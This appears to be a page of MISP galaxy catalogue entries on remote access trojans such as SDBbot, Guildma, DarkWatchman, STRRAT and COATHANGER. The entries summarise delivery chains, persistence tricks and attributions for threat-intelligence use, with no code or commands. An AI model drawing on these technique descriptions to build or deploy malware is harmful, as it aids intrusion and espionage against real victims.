SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence. SDBbot is composed of three pieces: an installer, a loader, and a RAT component.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SDBbot.

Known Synonyms
SDB bot
Internal MISP references

UUID 9d36db93-7d60-4da6-a611-1a32e02a054f which can be used as unique global reference for SDBbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Sepulcher

A China-based APT has been sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

Researchers discovered the new malware being distributed over the past six months through two separate campaigns. The first, in March, targeted European diplomatic and legislative bodies, non-profit policy research organizations and global organizations dealing with economic affairs. The second, in July, targeted Tibetan dissidents. They tied the campaigns to APT group TA413, which researchers say has been associated with Chinese state interests and is known for targeting the Tibetan community.

“Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, [we] have attributed both campaigns to the APT actor TA413,” said Proofpoint researchers in a Wednesday analysis. “The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest.”

Internal MISP references

UUID d0ed7527-cd1b-4b05-bbac-2e409ca46104 which can be used as unique global reference for Sepulcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Guildma

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Guildma.

Known Synonyms
Astaroth
Internal MISP references

UUID 833ed94d-97c1-4b57-9634-c27bf42eb867 which can be used as unique global reference for Guildma in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Milan

Milan is a 32-bit RAT written in Visual C++ and .NET. Milan is loaded and persists using tasks. An encoded routine waits for three to four seconds between executing the first task, deleting this task, and setting a second scheduled task for persistence.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Milan.

Known Synonyms
James
Internal MISP references

UUID a5e5a48a-5ce7-45f0-97d7-517d7f37b4ce which can be used as unique global reference for Milan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkWatchman

In late November, Prevailion’s Adversarial Counterintelligence Team (PACT) identified what appeared to be a malicious javascript-based Remote Access Trojan (RAT) that uses a robust Domain Generation Algorithm (DGA) to identify its Command and Control (C2) infrastructure and that utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation. This RAT, which PACT refers to by its internal codename “DarkWatchman”, has been observed being distributed by email and represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools. PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report.

Internal MISP references

UUID 35198ca6-6f8d-49cd-be1b-65f21b2e7e00 which can be used as unique global reference for DarkWatchman in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Ragnatela

Malwarebytes Lab identified a new variant of the BADNEWS RAT called Ragnatela. It is being distributed via spear phishing emails to targets of interest in Pakistan. Ragnatela, which means spider web in Italian, is also the project name and panel used by Patchwork APT. Ironically, the threat actor infected themselves with their own RAT.

Internal MISP references

UUID e79cb167-6639-46a3-9646-b12535aa21b6 which can be used as unique global reference for Ragnatela in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

STRRAT

STRRAT is a Java-based RAT with a JavaScript wrapper/dropper that was discovered in 2020. Its core payload (a .JAR file) is contained under several layers of obfuscation and encoding inside the JavaScript wrapper/dropper.

STRRAT is propagated by malicious email attachments. Its capabilities include standard RAT functionalities (remote access, remote command execution), browser and email-client credential harvesting, and a unique ransomware-like functionality – if instructed, it will add a “.crimson” extension to files on the device, rendering them inoperable (though they can be easily recovered because their content is not modified).

Unlike many Java-based malware, STRRAT does not require Java to be installed on the infected system in order to operate. When the JavaScript wrapper/dropper is executed, if a suitable Java runtime installation is not found, one will be downloaded and installed in order to assure the contained Java payload can execute.

Internal MISP references

UUID b30cb6f4-1e0a-4a97-8d88-ca38f83b4422 which can be used as unique global reference for STRRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

COATHANGER

Chinese FortiGate RAT. The COATHANGER malware is a remote access trojan (RAT) designed specifically for Fortigate appliances. It is used as second-stage malware, and does not exploit a new vulnerability. Intelligence services MIVD & AIVD refer to the malware as COATHANGER based on a string present in the code./nThe COATHANGER malware is stealthy and persistent. It hides itself by hooking system calls that could reveal its presence. It survives reboots and firmware upgrades./nMIVD & AIVD assess with high confidence that the malicious activity was conducted by a state-sponsored actor from the People’s Republic of China. This is part of a wider trend of Chinese political espionage against the Netherlands and its allies./nMIVD & AIVD assess that use of COATHANGER may be relatively targeted. The Chinese threat actor(s) scan for vulnerable edge devices at scale and gain access opportunistically, and likely introduce COATHANGER as a communication channel for select victims.

Internal MISP references

UUID c04e9738-de62-43e4-b645-2e308c1f77f7 which can be used as unique global reference for COATHANGER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value